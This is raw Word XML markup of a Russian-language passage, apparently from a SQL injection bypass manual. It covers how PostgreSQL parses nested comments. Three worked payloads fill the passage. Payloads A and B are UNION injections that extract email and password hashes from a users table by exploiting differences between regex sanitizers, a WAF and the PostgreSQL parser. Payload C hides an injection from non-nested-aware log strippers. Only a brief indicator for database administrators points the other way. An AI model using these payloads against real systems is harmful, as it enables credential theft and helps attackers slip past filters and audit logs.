          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG-парсер</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> видит вложенность:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'admin'/*outer/*inner*/' UNION ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">       ^                ^</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">       /* — открывает   &lt;-- здесь вложенный /* /* открывает level 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                ^^      &lt;-- здесь */ закрывает level 2</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но нужно ещё закрыть level 1, поэтому ищет дальше matching */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Стоп — здесь надо пересчитать. PG nested-aware значит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/*outer/*inner*/...*/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — два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(level 1 и level 2), два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(закрывает level 2, потом level 1). В payload — только ОДИН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(за inner). Значит PG считает, что комментарий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не закрыт</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и весь остаток payload (вплоть до конца строки) — внутри комментария → SQL syntax error.</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дефект Payload A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в моей наивной форме. Правильный Payload A должен иметь корректный balance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admin'/*outer/*inner*/*/  UNION SELECT id,email,password_hash FROM users--</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100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id, title, body FROM articles WHERE title = 'admin'/*outer/*inner*/*/  UNION SELECT id,email,password_hash FROM users--'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sanitizer non-greedy: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/*outer/*inner*/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — закрывается на первом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Остаток: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">*/  UNION SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — sanitizer видит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«синтаксис ошибки, но не комментарий» (это просто текст для него) — пропускает. WAF видит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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">триггерит</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Здесь надо добавить 3.9.6 (whitespace) или 3.9.5 (encoding) на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Альтернативный Payload — точно сбалансированная структура, которая для PG = пустота:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">admin'/**/UNION/**/SELECT id,email,password_hash FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Это уже 3.9.6 (whitespace через /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/). Граница: 3.12.1 — про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">обход sanitizer на NEST-семантике</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, 3.9.6 — про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">whitespace-equivalent**. Разные углы атаки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — sanitizer ел весь nested-block как один комментарий</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: sanitizer более sophisticated — он greedy, удаляет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greedy (Python re </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">re.DOTALL</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Идея разработчика: «удалить всё от первого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до последнего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Это блокирует Payload A структуру.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Но greedy-фильтр имеет другую слабость — он удаляет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">слишком много</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Атакующий может проложить запрос вокруг.</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admin'/*WAF-blocked-keyword*/UNION/*another*/SELECT id,email,password_hash FROM users WHERE'1'='1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sanitizer greedy: ищет первый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последний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От </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/*WAF-blocked-keyword*/UNION/*another*/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — между ними. Greedy удалит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">всё</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> между первым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последним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admin'SELECT id,email,password_hash FROM users WHERE'1'='1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sanitizer вырезал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посередине). Но также вырезал часть payload — и в итоге выдал какую-то странную форму. WAF после sanitize-фильтра видит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id, email, password_hash</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 может пройти как «обычный SELECT с конкатенацией», если WAF не понимает контекст.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В PG-парсере же:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'admin'/*WAF-blocked-keyword*/UNION/*another*/SELECT id,email,password_hash FROM users WHERE'1'='1'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Два отдельных комментария (PG обрабатывает их </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">как два</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/*WAF-blocked-keyword*/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> закрылся на первом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дальше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потом второй </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/*another*/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, потом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PG получает функционально:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id, title, body FROM articles WHERE title = 'admin' UNION SELECT id, email, password_hash FROM users WHERE'1'='1'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— стандартная UNION-атака. Sanitizer убил часть payload-а, но осталось достаточно для inject.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload C — nested как обход custom-пре-парсера ORM/log-стриппера</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: некоторые log-стрипперы (ORM-уровневые) удаляют комментарии из SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">перед</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> логированием, чтобы сократить логи. Если стриппер non-nested-aware, а PG nested-aware — разница в том, что логируется vs что выполняется. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">defensive evasion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не WAF-bypass.</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SELECT 1 /* legitimate-looking comment /* hidden_payload */ UNION SELECT password_hash FROM users */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Non-nested-aware стриппер: вырезает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/* legitimate-looking comment /* hidden_payload */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — между первым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первым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Остаётся в логах:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT 1  UNION SELECT password_hash FROM users */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— но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конце — синтаксис-ошибка, что заметно в логах. Стриппер не help-нул.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Этот Payload C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против PG-парсера: PG видит весь nested-block как один комментарий, всё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следующий statement (тут — синтаксис-ошибка). То есть Payload C </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> успешен на стороне логирования (где non-nested-aware стриппер удаляет hidden_payload из логов, маскируя атаку), не на стороне PG.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Это пример "log evasion" категории — атакующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не делает атаку</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через nested-comment, а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">скрывает</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> атаку от логов. Маркер для DBA: SQL в логах с trailing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без opening — индикатор log-stripping evasion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
